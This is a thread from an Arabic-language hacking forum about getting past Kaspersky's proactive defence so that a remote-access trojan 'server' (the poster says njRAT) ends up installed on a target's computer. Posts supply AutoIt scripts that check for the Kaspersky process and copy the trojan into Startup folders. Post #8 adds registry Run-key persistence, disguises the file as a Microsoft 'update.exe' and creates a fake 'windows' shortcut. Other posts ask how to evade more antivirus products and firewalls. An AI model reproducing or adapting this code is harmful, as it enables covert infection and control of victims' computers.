|
![]() |
|
أدوات الموضوع
![]() |
انواع عرض الموضوع
![]() |
![]() |
#1 | |||||||||
Creator
![]() ![]()
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
|
![]()
"أدخلـ, للتّطوير", للكاسبر, الدّفاع, الإستباقي, تخطّي السّلام عليكم جمعة مباركة نتمنّاها للجميع الموضوع طرح أكثر من مرّة و جرّبت حلولا عديدة لكن للأسف أخفقت معها راجعت بعض الأسطوانات عندي للغة AutoiT فوجدتــ أحدها يتكلّم عن العبارة الشّرطيّة if قلت لما لا أطبّقها و أرى النّتيجة يعني " إن .....فـ" مبدأ الفكرة: هو أن جميع برامج البدأ تشتغل قبل الكاسبر ، يعني قبل هو ما يتحرّك يكون السّيرفر قد ثبّت و لا مجال لمراقبته سلبيّاتها: لازم الشّخص المستهدف يعمل روستارت للجهاز ( يعني راح يعمل روستارت يعمل) المتطلّبات: *1 سيرفر كلين من الكاسبر لأيّ برنامج إختراقـ *2 إعداداتك كاملة ( تثبيت في الرّيجيستري، مع التّشغيل و و و ....) *3 برنامج الـ AutoiT (موجود في الموقع الرّسمي ) و لنبدأ على بركة الله بشرح الـ script المراد كتابته : *1 نضع الشّرط : إن كان الكاسبر شغّالـ *2 جواب الشّرط: السّيرفر لا يشتغل بل ينسخ نفسه في StartUp يعني بمجرّد ما يشتغل الكمبيوتر يستغل السّيرفر *3 إن كان العكس يشتغل السّيرفر مباشرة ( إضافةفقط) الكود جاهز و قابل للإضافات كود:
#NoTrayIcon Opt("TrayIconHide", 1) if ProcessExists("avp.exe") Then FileCopy("server.exe",@startupDir) Else Run("server.exe") EndIf للعلم فقد تمّ تجربته قبل وضع هنا على Njrat و السّلام عليكم المصدر: development-point - للمزيد تابع : قسم إختراق الأجـهـزه والأيـمـيـلات jo'~d hg]~thu hgYsjfhrd gg;hsfv "H]ogJ ggj~',dv"
|
|||||||||
![]() |
![]() |
#2 |
![]()
مشكور يعطيك العافية
جاري الجربة
|
|
![]() |
![]() |
#3 | ||||||
Creator
![]() ![]() ![]()
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
|
![]()
مــشـــــكور اخي
بارك الله فيك لكن استفسار بعد اذنك ممكن ان اضع اكثر من بروسيس حماية في السكريبت يعني اضع الـ ( كاسبر ) + ( افيرا ) + ( افاست ) ++ الـــخ منتظرك
|
||||||
![]() |
![]() |
#4 | ||||||||||||||||||||||||||||||
Creator
![]() ![]()
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
|
![]()
نعم فالامر سهل
كل ما عليك ان تضيف جملة شرطية و تضع ما سيتم العمل داخل الجملة بالتوفيق
|
||||||||||||||||||||||||||||||
![]() |
![]() |
#5 | ||||||
Creator
![]() ![]() ![]()
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
|
![]()
طيب , ممكن اسماء البروسيس
لجميع انواع الحمايات ( التي لها دفاعات استباقية ) منتظرك
|
||||||
![]() |
![]() |
#6 | ||||||||||||||||||||||||||||||
Creator
![]() ![]()
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
|
![]()
لا اعرفها اخي للاسف ( يمكنك البحث في قوقل )
![]() ![]()
|
||||||||||||||||||||||||||||||
![]() |
![]() |
#7 | |||||||||
Creator
![]() ![]()
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
|
![]()
MR:HACK
--------- أيّ لغة هي ترجمة لشيئ تريده أنتـ و هنا تودّ تخطّي باقي الحمايات بما أنّنا نعرف إسم الـ process للكاسبر الذي هو avp.exe سنعيد كتابة السّكريب بتغيير بسيط *1 إذا كان الكاسبر شغّالــ كود:
If ProcessExists("avp.exe") قم بنسخ ملفّ السيرفر في قائمة بداية التّشغيلـ كود:
FileCopy("server.exe",@StartupCommonDir) قم بنسخ ملف السّيرفر أيضا في قائمة بداية التّشغيلـ مع الإستبدال إذا كان موجود أصلا كود:
FileCopy("server.exe",@StartupCommonDir,1) كود:
#NoTrayIcon Opt("TrayIconHide", 1) If ProcessExists("avp.exe") Then FileCopy("server.exe",@StartupCommonDir) Else FileCopy("server.exe",@StartupCommonDir,1) EndIf
|
|||||||||
![]() |
![]() |
#8 | |||||||||
Creator
![]() ![]()
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
|
![]()
هذا كود إضافي من أحد الأصدقاء تستطيع به تشغيلـ سيرفر الـCyber و الـ Xtrem تقولي لماذا هما فقط أقلّك شرطه: * لا تفعّل خاصيّة البدأ مع الويندوز Run على البرنامج * لا تفعّل خاصيّة الحقن * لا تفعّل خاصيّة التّبيت بالروجيستري السّكريبت يقوم بذلك المهم السّيرفر يكون كلين كود:
if Not FileExists(@AppDataDir&"\Microsoft\update.exe") Then RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\", "work", "REG_EXPAND_SZ","%APPDATA%\Microsoft\update.exe") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\", "work", "REG_EXPAND_SZ","%APPDATA%\Microsoft\update.exe") FileCreateShortcut("%APPDATA%\Microsoft\update.exe", @StartupDir & "\windows.lnk", "%APPDATA%\Microsoft\", "", "windows", @SystemDir & "\shell32.dll", "", "4", @SW_MINIMIZE) FileInstall("update.exe",@AppDataDir&"\Microsoft\update.exe",1) EndIf update.exe هو إسم سيرفرك و إختراقات موفّقة
|
|||||||||
![]() |
![]() |
#9 | ||||||
Very Excellent
![]() ![]() ![]() ![]() ![]() ![]() ![]()
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
|
![]()
يعطيكـ العافيه ياغالي يستفيدو منو الشباب وفي كمان شفت شرح
|
||||||
![]() |
![]() |
#10 | |||||||||||||||||||||||||||
Creator
![]() ![]() ![]()
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
|
![]()
اخي الكريم هل هذا الكود يتخطى جميع الدفاعات الاستباقية للحمايات ؟!؟ و هل يتخطى الفيروال ؟!؟ منتظرك
|
|||||||||||||||||||||||||||
![]() |
![]() |
مواقع النشر (المفضلة) |
الكلمات الدلالية (Tags) |
"أدخلـ, للتّطوير", للكاسبر, الدّفاع, الإستباقي, تخطّي |
![]() |
|
الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1) | |
|
|
![]() |
||||
الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
[ مشكله ] الدّفاع الإستباقي | الباتش النّائم | مشاكل وحلول إختراق الأجهزة | 7 | 02-20-2013 12:12 AM |